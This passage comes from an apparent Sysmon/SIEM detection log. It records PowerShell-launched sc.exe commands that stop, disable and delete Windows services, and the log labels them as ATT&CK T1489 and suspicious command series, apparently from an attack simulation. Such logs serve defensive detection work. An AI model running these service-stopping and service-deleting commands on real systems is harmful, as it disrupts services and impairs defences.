12:51:59.627"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00107e3d2e00}"",""processId"":""7212"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.963",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.572 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00106e3a2e00} +ProcessId: 4312 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.574761600Z"",""eventRecordID"":""3410"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.572\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00106e3a2e00}\r\nProcessId: 4312\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.572"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00106e3a2e00}"",""processId"":""4312"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.713",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.514 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00105b362e00} +ProcessId: 3440 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.517240500Z"",""eventRecordID"":""3407"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.514\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00105b362e00}\r\nProcessId: 3440\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.514"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00105b362e00}"",""processId"":""3440"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.701",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.493 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00104f352e00} +ProcessId: 8132 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.496815300Z"",""eventRecordID"":""3406"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.493\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00104f352e00}\r\nProcessId: 8132\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.493"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00104f352e00}"",""processId"":""8132"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.665",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.457 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001093332e00} +ProcessId: 5592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.461392200Z"",""eventRecordID"":""3404"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.457\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001093332e00}\r\nProcessId: 5592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.457"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001093332e00}"",""processId"":""5592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.566",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.407 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001018312e00} +ProcessId: 360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.410918100Z"",""eventRecordID"":""3401"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.407\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001018312e00}\r\nProcessId: 360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.407"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001018312e00}"",""processId"":""360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.537",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.350 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010112f2e00} +ProcessId: 5176 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.352554400Z"",""eventRecordID"":""3399"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.350\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010112f2e00}\r\nProcessId: 5176\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.350"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010112f2e00}"",""processId"":""5176"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 